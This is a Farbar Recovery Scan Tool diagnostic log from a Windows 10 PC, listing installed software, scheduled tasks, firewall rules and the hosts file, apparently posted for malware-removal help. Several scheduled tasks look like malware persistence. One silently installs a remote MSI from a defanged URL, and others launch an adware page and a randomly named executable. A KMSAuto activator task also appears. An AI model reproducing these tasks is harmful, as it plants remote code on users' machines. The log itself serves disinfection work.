Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21.11.2018
Ran by usuario (24-11-2018 18:06:07)
Running from C:\Users\usuario\Desktop
Windows 10 Pro Version 1803 17134.407 (X64) (2018-11-17 00:32:51)
Boot Mode: Safe Mode (with Networking)
==========================================================

==================== Accounts: =============================

Administrador (S-1-5-21-3915770623-3759347639-1613647934-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3915770623-3759347639-1613647934-503 - Limited - Disabled)
Invitado (S-1-5-21-3915770623-3759347639-1613647934-501 - Limited - Disabled)
usuario (S-1-5-21-3915770623-3759347639-1613647934-1001 - Administrator - Enabled) => C:\Users\usuario
WDAGUtilityAccount (S-1-5-21-3915770623-3759347639-1613647934-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\uTorrent) (Version: 3.5.4.44846 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.008.20081 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 31.0.0.96 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0) (Version: 20.0.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.1 - Advanced Micro Devices, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine)
CPUID CPU-Z 1.87 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.87 - CPUID, Inc.)
Discord (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\Discord) (Version: 0.0.301 - Discord Inc.)
Dishonored 2 (HKLM-x32\...\Dishonored 2_is1) (Version: - )
Epic Games Launcher (HKLM-x32\...\{9B504F12-DA3B-4CEC-A6FD-B07D6C1FEA26}) (Version: 1.1.167.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Google Chrome (HKLM\...\{AA1B5CB3-7646-3858-A35C-158DB3846A9F}) (Version: 70.0.3538.110 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Java 8 Update 191 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
Java 8 Update 191 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
K-Lite Codec Pack 14.5.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.5.5 - KLCP)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Malwarebytes versión 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office Profesional Plus 2016 - es-es (HKLM\...\ProPlusRetail - es-es) (Version: 16.0.11001.20108 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\OneDriveSetup.exe) (Version: 18.192.0920.0015 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
MSI Afterburner 4.5.0 (HKLM-x32\...\Afterburner) (Version: 4.5.0 - MSI Co., LTD)
MSI DragonEye (HKLM\...\{7116875E-F251-4C33-AB3F-37DE05B15595}_is1) (Version: 0.0.2.6 - MSI)
MSI Gaming APP (HKLM-x32\...\{E0229316-E73B-484B-B9E0-45098AB38D8C}}_is1) (Version: 6.2.0.49 - MSI)
Nitro Pro 9 (HKLM\...\{552C86A4-E3F6-4C01-8079-D66E92CF334B}) (Version: 9.5.3.8 - Nitro)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.6 - Notepad++ Team)
OEM Application Profile (HKLM-x32\...\{7F5DCD33-1039-C3B2-9538-B645B65BBA63}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0C0A-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.10.714.2016 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8040 - Realtek Semiconductor Corp.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs OBS 0.11.3 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 0.11.3 - General Workings, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TP-LINK TL-WN821N(C)_TL-WN822N_TL-WN823N Driver (HKLM-x32\...\{852E893E-E4FD-45BB-8B17-72ADDF686974}) (Version: 1.3.1 - TP-LINK)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{C5FDDED7-DEC7-48B4-AFD8-DFB8A0FD199A}) (Version: 2.51.0.0 - Microsoft Corporation)
USB Disk Security (HKLM-x32\...\USB Disk Security_is1) (Version: - Zbshareware Lab)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
XSplit Broadcaster (HKLM-x32\...\{306BF455-B199-433A-9217-7E80CE1B7683}) (Version: 2.8.1607.1944 - SplitmediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-11-12] ()
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => C:\Program Files\Nitro\Pro 9\NPShellExtension.dll [2014-08-01] (Nitro PDF)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-06] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {029AE7A2-9367-49BE-971E-D0CF5B1E9E8D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {12407AB4-701D-4038-A393-8FB4A19ABB19} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated)
Task: {19602A3C-6345-4BA9-AFF0-4E7E9394D3D6} - System32\Tasks\MSIOSDx64_Host => C:\Program Files (x86)\MSI\Gaming APP\OSD\x64\MsiGamingOSD_x64.exe [2017-09-05] (Micro-Star INT'L CO., LTD.)
Task: {2D80FB38-436D-41AA-954D-9200A6A58286} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {3268519A-9765-4A48-A5FD-23453043DDD0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-11-16] (Google Inc.)
Task: {33992D3E-B3FE-4A5E-BD0A-DB9176D7BDB0} - System32\Tasks\MSIOSDx86_Host => C:\Program Files (x86)\MSI\Gaming APP\OSD\x86\MsiGamingOSD_x86.exe [2017-09-05] (Micro-Star INT'L CO., LTD.)
Task: {3D576F42-CA4D-4B99-8010-5BC694FA10AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {3ED37AAE-4A2C-41F9-9277-14F58D4673CC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-11-02] (Microsoft Corporation)
Task: {40A492BD-CE8D-4668-819B-FBDFB4612196} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-11-17] (Microsoft Corporation)
Task: {54A90687-5D8B-477A-969D-ED1680B86120} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [2018-11-17] (Microsoft Corporation)
Task: {5AE47641-9CD8-4507-832B-ADCE30CA22BD} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-06] (Advanced Micro Devices, Inc.)
Task: {5C7BED72-32AB-49D9-8C38-124B10473B34} - System32\Tasks\{6FAAD7ED-945D-1F3D-7344-4A1CF404A45C} => C:\Program Files (x86)\Common Files\hAwYUAXJE.exe [2018-04-11] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-11] ()
Task: {6E670BDA-DFD2-4103-9CEE-F2D4A60627DC} - System32\Tasks\MSIGH_Host => C:\Program Files (x86)\MSI\Gaming APP\GamingHotkey.exe [2017-11-01] (Micro-Star INT'L CO., LTD.)
Task: {74E4D3B4-E4B9-4D09-93FF-0AA379EF1EF4} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-11-17] (Microsoft Corporation)
Task: {7712C825-649D-4197-A60A-82514E11EC07} - System32\Tasks\{C61D7FD7-9DCC-9B3F-D9C4-59839A671D13} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://asompharr.com/cl/?guid=t59mp7zvs8eu7nlo643wtthp2p0s6cdq&prid=1&pid=5_1301_41602
Task: {79619546-DDD9-422E-86E7-C39AF3A40953} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2018-11-17] (Microsoft Corporation)
Task: {8E751ED9-59AE-4C98-8827-CD861BBACE15} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-11-16] (Google Inc.)
Task: {9DBEC8AA-1434-4735-97DD-6F8842EDF03C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2018-11-17] (Microsoft Corporation)
Task: {B141150B-133D-4DBF-A4F7-F657FEE76ED9} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2016-08-10] (MSFree Inc.)
Task: {B5ECA36D-1EE6-4CE1-82B4-CBAA8B7D0C13} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [2018-11-17] (Microsoft Corporation)
Task: {B8DBA90C-0EF2-4383-A245-C2A58F732785} - System32\Tasks\MSISW_Host => C:\Windows\SysWOW64\muachost.exe [2015-08-18] (MSI)
Task: {C402E782-5F47-4FB6-A920-B5EBC16F6936} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-06] (Advanced Micro Devices, Inc.)
Task: {D6C92521-7047-4171-81B0-D0FF5417BA96} - System32\Tasks\AdobeGCInvoker-1.0-DESKTOP-CM2QFMQ-usuario => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-09-10] (Adobe Systems, Incorporated)
Task: {ED1EAD7C-0560-4234-820D-0C98E1F704A1} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-11-02] (Microsoft Corporation)
Task: {F132082F-7019-4989-BDD0-8850D0E8F19A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {F2869E2E-73DD-4237-BA82-5C283D76283E} - System32\Tasks\{65151975-D51E-B35B-8543-ED1A20B306C4} => "msiexec" /i hxxps://faremler.com/jemtb0pcam1q.eux /q
Task: {FC86950E-75CB-4FDD-BA82-FFD4ED99E93B} - System32\Tasks\klcp_update => CodecTweakTool.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2018-11-24 16:58 - 2018-11-24 17:15 - 002695360 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-11-16 21:14 - 2018-11-17 00:21 - 008981800 _____ () C:\Program Files\Microsoft Office\root\Office16\3082\GrooveIntlResource.dll
2018-11-12 18:35 - 2018-11-12 18:35 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-11-20 17:16 - 2018-11-01 01:55 - 002185216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [484]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2018-04-11 18:38 - 2018-11-24 16:56 - 000000880 _____ C:\Windows\system32\Drivers\etc\hosts

0.0.0.0 telemetry.malwarebytes.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\usuario\Desktop\PROJECT-Hunters-Jhin-Vayne-Cinematic-HD-Wallpaper-Background-Official-Art-Artwork-League-of-Legends-lol.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "Steam"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{10E0545C-CF6A-4AD4-892E-3F991CC2EB15}] => (Allow) C:\Program files (x86)\raidxpert2\apache\bin\httpd.exe
FirewallRules: [{377A3CE0-18F7-4791-9C1D-6AF0C3CCB5E5}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{E0F3D7BC-65EF-4737-AC72-81A1C11B792F}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{5191D0AD-D6B0-4B17-8610-36A6AA4E9AD4}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F85366D9-0C01-45B1-98E8-A0E611A24B5F}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{78026738-F143-4997-A434-EB7D471C8E2B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{752075B3-C1A9-4A68-9D6B-4E17D2175987}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [TCP Query User{6E661785-DAC2-44B9-A6D4-B33E020F45B3}D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{A1481354-E275-4BFB-A7C4-B99B14051156}D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [{B0297618-BADF-49DC-ACBA-64231CE5459E}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{08AD1D79-70B3-4B21-B593-BD995ED24DAB}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{E6A7C047-C0D7-4CB6-887F-FB51DD1BFD44}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F50A7D47-1C81-400C-84B6-1E50144E097D}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B7E24E3E-8008-43E8-BD0B-7902480B6A4D}] => (Allow) D:\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{A6E8EA71-ABD9-4EC0-A6DF-0601633E398E}] => (Allow) D:\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [TCP Query User{62A787A3-1D31-4123-B806-3B318BB25F12}D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{8EF571EB-B4D9-44DC-8CC8-EFCAE3E418BB}D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [{F74C1B26-A127-4DB3-AFF5-7B9C0B09E030}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{78A3195C-25AC-4512-8D72-9480160D8D7E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{CEA44204-69D2-4BA2-BF7C-D72A077086E9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{D4B97479-874F-4847-AF36-9CC9A8882306}] => (Allow) D:\Juegos\Steam\Steam.exe
FirewallRules: [{0D5D9C89-C77D-4A8A-A87C-27AF33F560AD}] => (Allow) D:\Juegos\Steam\Steam.exe
FirewallRules: [{F7E9BD23-AB61-49CF-9581-DE803C14763F}] => (Allow) D:\Juegos\Steam\bin\cef\cef.win7\steamwebhelper.exe
